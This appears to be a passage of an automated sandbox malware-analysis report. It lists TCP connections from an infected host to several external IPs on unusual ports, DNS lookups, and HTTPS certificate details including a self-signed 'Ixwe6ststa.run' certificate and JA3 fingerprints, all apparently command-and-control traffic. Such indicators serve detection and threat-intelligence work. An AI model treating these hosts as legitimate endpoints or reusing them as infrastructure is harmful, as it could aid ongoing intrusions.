Jan 12, 2021 07:42:01.219815016 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.219871044 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.219976902 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.233808041 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.293550968 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.293787956 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.298188925 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.298264027 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.351845980 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.352066994 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.391417980 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.406256914 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.406282902 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.496197939 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.496258020 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.496454954 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.499131918 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.552583933 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.612560987 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.665714025 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:01.665915966 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.666925907 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.719683886 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:01.726754904 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:01.726789951 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:01.726998091 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.734637976 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.788625002 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:01.788863897 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.798947096 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.799252987 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.852013111 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:01.852395058 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:01.889317989 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:01.905333996 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:02.008959055 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:02.009013891 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:02.009244919 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:02.011503935 CET	49405	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:02.064291000 CET	1512	49405	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:02.127298117 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.179296017 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.179409027 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.180480003 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.232359886 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.247072935 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.247183084 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.256627083 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.310925007 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.311073065 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.317930937 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.318170071 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.369903088 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.370155096 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.422127008 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.422177076 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.541088104 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.541138887 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.541287899 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.541466951 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.545955896 CET	49406	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:02.597754002 CET	443	49406	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:02.656070948 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.700139046 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:02.700237036 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.700879097 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.743977070 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:02.755636930 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:02.755665064 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:02.755837917 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.772309065 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.817634106 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:02.817773104 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.822360039 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.822515011 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.865746975 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:02.866039038 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:02.909293890 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:03.023986101 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:03.024063110 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:03.024286032 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:03.027777910 CET	49407	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:03.071332932 CET	3308	49407	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:03.143656015 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.197266102 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.197439909 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.198381901 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.251611948 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.281435966 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.281522989 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.281582117 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.281620026 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.290493965 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.348222017 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.348407030 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.354201078 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.354396105 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.407565117 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.407774925 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.447344065 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.461102962 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.461117983 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.551892042 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.552005053 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.552136898 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.552213907 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.555280924 CET	49408	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:03.608670950 CET	3389	49408	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:03.671057940 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.724451065 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.724648952 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.726496935 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.779542923 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.786701918 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.786858082 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.787010908 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.787856102 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.801481009 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.855829000 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.856008053 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.864258051 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.864584923 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.917527914 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.917820930 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:03.957146883 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.970756054 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:03.970782042 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:04.068454027 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:04.068500996 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:04.068717957 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:04.071746111 CET	49409	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:42:04.124624968 CET	1512	49409	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:04.186439037 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.238421917 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.238580942 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.239875078 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.291783094 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.306580067 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.306668043 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.322489977 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.376806021 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.377005100 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.383346081 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.383553982 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.435247898 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.435456038 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.487376928 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.607026100 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.607078075 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.607355118 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.613213062 CET	49410	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:04.665098906 CET	443	49410	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:04.735789061 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.779161930 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.779382944 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.780849934 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.824007988 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.834673882 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.834721088 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.834826946 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.834863901 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.846677065 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.892394066 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.892498016 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.903575897 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.903928995 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.947295904 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.947423935 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:04.987020969 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.990529060 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:04.990557909 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:05.103712082 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:05.103780031 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:05.103835106 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:05.103888988 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:05.110002041 CET	49411	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:05.153176069 CET	3308	49411	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:05.219315052 CET	49412	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:05.273472071 CET	3389	49412	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:05.273633003 CET	49412	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:05.274158955 CET	49412	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:05.327383041 CET	3389	49412	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:05.352299929 CET	3389	49412	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:05.352346897 CET	3389	49412	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:05.352436066 CET	49412	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:05.352473974 CET	49412	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:05.363861084 CET	49412	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:05.432825089 CET	3389	49412	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:05.432940006 CET	49412	3389	192.168.2.22	5.100.228.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 07:39:44.630251884 CET	52197	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:39:44.698278904 CET	53	52197	8.8.8.8	192.168.2.22
Jan 12, 2021 07:39:52.469271898 CET	53099	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:39:52.517098904 CET	53	53099	8.8.8.8	192.168.2.22
Jan 12, 2021 07:39:52.769494057 CET	52838	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:39:52.825742006 CET	53	52838	8.8.8.8	192.168.2.22
Jan 12, 2021 07:40:29.825201035 CET	61200	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:40:29.873004913 CET	53	61200	8.8.8.8	192.168.2.22
Jan 12, 2021 07:40:29.904664040 CET	49548	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:40:29.952553034 CET	53	49548	8.8.8.8	192.168.2.22
Jan 12, 2021 07:40:30.848588943 CET	55627	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:40:30.896363974 CET	53	55627	8.8.8.8	192.168.2.22
Jan 12, 2021 07:40:30.908526897 CET	56009	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:40:30.956259012 CET	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 12, 2021 07:39:44.630251884 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	education.scrollx.in	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 12, 2021 07:39:44.698278904 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	education.scrollx.in	104.27.153.52	A (IP address)	IN (0x0001)
Jan 12, 2021 07:39:44.698278904 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	education.scrollx.in	172.67.211.199	A (IP address)	IN (0x0001)
Jan 12, 2021 07:39:44.698278904 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	education.scrollx.in	104.27.152.52	A (IP address)	IN (0x0001)
Jan 12, 2021 07:40:30.896363974 CET	8.8.8.8	192.168.2.22	0xcccd	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)
Jan 12, 2021 07:40:30.896363974 CET	8.8.8.8	192.168.2.22	0xcccd	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
Jan 12, 2021 07:40:30.956259012 CET	8.8.8.8	192.168.2.22	0x5e1e	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
Jan 12, 2021 07:40:30.956259012 CET	8.8.8.8	192.168.2.22	0x5e1e	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 12, 2021 07:39:44.823704958 CET	104.27.153.52	443	192.168.2.22	49165	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed May 20 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Thu May 20 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 12, 2021 07:39:44.823704958 CET	104.27.153.52	443	192.168.2.22	49165	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 12, 2021 07:39:50.885082006 CET	77.220.64.37	443	192.168.2.22	49166	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:39:55.937339067 CET	77.220.64.37	443	192.168.2.22	49171	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:39:57.985172033 CET	77.220.64.37	443	192.168.2.22	49175	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:00.063389063 CET	77.220.64.37	443	192.168.2.22	49179	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:02.122035027 CET	77.220.64.37	443	192.168.2.22	49183	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:04.216496944 CET	77.220.64.37	443	192.168.2.22	49187	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:06.290813923 CET	77.220.64.37	443	192.168.2.22	49191	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:08.344388962 CET	77.220.64.37	443	192.168.2.22	49195	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:11.713543892 CET	77.220.64.37	443	192.168.2.22	49199	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:13.772563934 CET	77.220.64.37	443	192.168.2.22	49203	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:15.832707882 CET	77.220.64.37	443	192.168.2.22	49207	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:18.097915888 CET	77.220.64.37	443	192.168.2.22	49212	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:20.146485090 CET	77.220.64.37	443	192.168.2.22	49216	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:22.234646082 CET	77.220.64.37	443	192.168.2.22	49220	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:24.288883924 CET	77.220.64.37	443	192.168.2.22	49224	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:26.363502026 CET	77.220.64.37	443	192.168.2.22	49228	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
